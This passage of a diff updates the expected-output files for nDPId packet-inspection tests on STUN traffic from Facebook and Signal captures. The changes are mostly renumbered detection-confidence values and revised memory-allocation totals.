+00833{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":75,"source":"stun_facebook.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":75,"flow_first_seen":1629291451242,"flow_last_seen":1629291461336,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":7404,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1629291461336,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"31.13.86.54","src_port":38123,"dst_port":40003,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.FacebookVoip","breed":"Acceptable","category":"VoIP"}} 00563{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":75,"source":"stun_facebook.pcapng","alias":"nDPId-test","packets-captured":75,"packets-processed":75,"total-skipped-flows":0,"total-l4-payload-len":7404,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1629291461336} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 75/75 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5879826 bytes -~~ total memory freed........: 5879826 bytes -~~ total allocations/frees...: 118191/118191 +~~ total memory allocated....: 6013460 bytes +~~ total memory freed........: 6013460 bytes +~~ total allocations/frees...: 120953/120953 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 471 chars ~~ json string max len.......: 838 chars diff --git a/test/results/stun_signal.pcapng.out b/test/results/stun_signal.pcapng.out index dd2391052..fa44bcbde 100644 --- a/test/results/stun_signal.pcapng.out +++ b/test/results/stun_signal.pcapng.out @@ -14,32 +14,32 @@ 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1636901936070,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1636901936070,"pkt":"CL6sCxdumt9Y+uvcCABFAAAwnVBAAEAR9NXAqAypI563p5peAbsAHIqqAAEAACESpEJaZmI0ZFV3bVhyejU="} 00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636901936083,"flow_last_seen":1636901936083,"flow_idle_time":140000,"flow_min_l4_payload_len":56,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1636901936083,"l3_proto":"ip4","src_ip":"35.158.183.167","dst_ip":"192.168.12.169","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1636901936083,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1636901936083,"pkt":"mt9Y+uvcCL6sCxduCABFAABMbq0AAOABw2wjnrenwKgMqQMDpcEAAAAARQAAMJ1NQAAgERTZwKgMqSOet6e4ZAG7ABzz8QABAAAhEqRCME1BM2doTDV4K0Zu"} -00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636901936083,"flow_last_seen":1636901936083,"flow_idle_time":140000,"flow_min_l4_payload_len":56,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1636901936083,"l3_proto":"ip4","src_ip":"35.158.183.167","dst_ip":"192.168.12.169","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":5.050556} +00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636901936083,"flow_last_seen":1636901936083,"flow_idle_time":140000,"flow_min_l4_payload_len":56,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1636901936083,"l3_proto":"ip4","src_ip":"35.158.183.167","dst_ip":"192.168.12.169","l4_proto":"icmp","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":5.050556} 00551{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1636901936087,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":92,"thread_ts_msec":1636901936087,"pkt":"mt9Y+uvcCL6sCxduCABFAABwLztAAOARwqojnrenwKgMqQ2WuGQAXLAaAQEAQCESpEJjaDExN25ZQXk2MTAAIAAIAAEPY3w9RVEAAQAIAAEucV0v4ROAKwAIAAENliOet6eALAAIAAEAUCOet6eAIgAETm9uZYAoAATCHshI"} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1636901936087,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1636901936087,"pkt":"mt9Y+uvcCL6sCxduCABFAABMbq4AAOABw2sjnrenwKgMqQMDpcEAAAAARQAAMJ1QQAAdERfWwKgMqSOet6eaXgG7AByKqgABAAAhEqRCWmZiNGRVd21Ycno1"} 00552{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1636901936087,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":92,"thread_ts_msec":1636901936087,"pkt":"mt9Y+uvcCL6sCxduCABFAABwLzxAAOMRv6kjnrenwKgMqQ2Wml4AXJaEAQEAQCESpEJkOSt6R0JMc3JIbisAIAAIAAEPYnw9RVEAAQAIAAEucF0v4ROAKwAIAAENliOet6eALAAIAAEAUCOet6eAIgAETm9uZYAoAAT07Zjq"} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1636901936120,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1636901936120,"pkt":"CL6sCxdumt9Y+uvcCABFAAA4nVJAAEAR9MvAqAypI563p5peDZYAJPVxAAMACCESpEI3Q1lCTmVMaEVzcmUAGQAEEQAAAA=="} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1636901936135,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1636901936135,"pkt":"CL6sCxdumt9Y+uvcCABFAAA4nVNAAEAR9MrAqAypI563p7hkAbsAJNuCAAMACCESpEI0YTJQbEl4dk1TUisAGQAEEQAAAA=="} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1636901936135,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1636901936135,"pkt":"CL6sCxdumt9Y+uvcCABFAAA4nVRAAEAR9MnAqAypI563p5peAbsAJPWkAAMACCESpEJKS0hOWUJHNGV5VkoAGQAEEQAAAA=="} -00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":14,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1636901936070,"flow_last_seen":1636901936138,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":92,"flow_tot_l4_payload_len":224,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1636901936138,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":39518,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}} +00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":14,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1636901936070,"flow_last_seen":1636901936138,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":92,"flow_tot_l4_payload_len":224,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1636901936138,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":39518,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1636901936144,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1636901936144,"pkt":"CL6sCxdumt9Y+uvcCABFAAA4nVVAAEAR9MjAqAypI563p7hkDZYAJNmuAAMACCESpEIwWE1VcCtxUS9rUlMAGQAEEQAAAA=="} -00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1636901936070,"flow_last_seen":1636901936144,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":84,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1636901936144,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":47204,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}} +00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1636901936070,"flow_last_seen":1636901936144,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":84,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1636901936144,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":47204,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}} 00514{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1636901936150,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1636901936150,"pkt":"mt9Y+uvcCL6sCxduCABFAABUbrkAAOABw1gjnrenwKgMqQMDpckAAAAARQAAOJ1TQAAgERTLwKgMqSOet6e4ZAG7ACTbggADAAghEqRCNGEyUGxJeHZNU1IrABkABBEAAAA="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1636901936292,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1636901936292,"pkt":"CL6sCxdumt9Y+uvcCABFAAAwdWhAAEAR0YbAqAyprP15f5peS2YAHHHgAAEAACESpEJTQ2RLNjF0alZXNms="} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1636901936040,"flow_last_seen":1636901936292,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1636901936292,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"172.253.121.127","src_port":39518,"dst_port":19302,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1636901936040,"flow_last_seen":1636901936292,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1636901936292,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"172.253.121.127","src_port":39518,"dst_port":19302,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1636901936292,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1636901936292,"pkt":"CL6sCxdumt9Y+uvcCABFAAAwdWlAAEAR0YXAqAyprP15f7hkS2YAHGpqAAEAACESpEJ0a0VLMmtzWEZzMm8="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1636901936316,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1636901936316,"pkt":"CL6sCxdumt9Y+uvcCABFAAAwnWJAAEAR9MPAqAypI563p7hkAbsAHPPxAAEAACESpEIwTUEzZ2hMNXgrRm4="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1636901936320,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1636901936320,"pkt":"CL6sCxdumt9Y+uvcCABFAAAwnWNAAEAR9MLAqAypI563p5peAbsAHIqqAAEAACESpEJaZmI0ZFV3bVhyejU="} -00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":26,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1636901936070,"flow_last_seen":1636901936320,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1636901936320,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":39518,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}} +00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":26,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1636901936070,"flow_last_seen":1636901936320,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1636901936320,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":39518,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1636901936411,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1636901936411,"pkt":"mt9Y+uvcCL6sCxduCABFgAA80K0AACYRz7Ws\/Xl\/wKgMqUtmml4AKJ+iAQEADCESpEJTQ2RLNjF0alZXNmsAIAAIAAEPYnw9RVE="} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1636901936415,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1636901936415,"pkt":"mt9Y+uvcCL6sCxduCABFgAA8TlEAACURUxKs\/Xl\/wKgMqUtmuGQAKJgrAQEADCESpEJ0a0VLMmtzWEZzMm8AIAAIAAEPY3w9RVE="} -00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1636901936065,"flow_last_seen":1636901936889,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1636901936889,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":47204,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1636901936065,"flow_last_seen":1636901936889,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1636901936889,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":47204,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":56,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636901956886,"flow_last_seen":1636901956886,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1636901956886,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":43068,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1636901956886,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1636901956886,"pkt":"CL6sCxdumt9Y+uvcCABFAAAwnuBAAEAR80XAqAypI563p6g8DZYAHMrjAAEAACESpEJ3MXhZWGxMSlFtK2Q="} -00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636901956886,"flow_last_seen":1636901956886,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1636901956886,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":43068,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}} +00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636901956886,"flow_last_seen":1636901956886,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1636901956886,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":43068,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":57,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636901956899,"flow_last_seen":1636901956899,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1636901956899,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":43068,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1636901956899,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1636901956899,"pkt":"CL6sCxdumt9Y+uvcCABFAAAwnuFAAEAR80TAqAypI563p6g8AbsAHKfZAAEAACESpEJpNFFIaG51aVlxTjI="} -00795{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":57,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636901956899,"flow_last_seen":1636901956899,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1636901956899,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":43068,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"STUN.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00795{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":57,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636901956899,"flow_last_seen":1636901956899,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1636901956899,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":43068,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"STUN.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":58,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636901956900,"flow_last_seen":1636901956900,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1636901956900,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"172.253.121.127","src_port":43068,"dst_port":19302,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1636901956900,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1636901956900,"pkt":"CL6sCxdumt9Y+uvcCABFAAAwevFAAEARy\/3AqAyprP15f6g8S2YAHDXLAAEAACESpEJuRGJFSkJreUFwVW4="} 00553{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1636901956903,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":92,"thread_ts_msec":1636901956903,"pkt":"mt9Y+uvcCL6sCxduCABFAABwP61AAOARsjgjnrenwKgMqQ2WqDwAXIeiAQEAQCESpEJ3MXhZWGxMSlFtK2QAIAAIAAEPlHw9RVEAAQAIAAEuhl0v4ROAKwAIAAENliOet6eALAAIAAEAUCOet6eAIgAETm9uZYAoAARTHy4\/"} @@ -47,10 +47,10 @@ 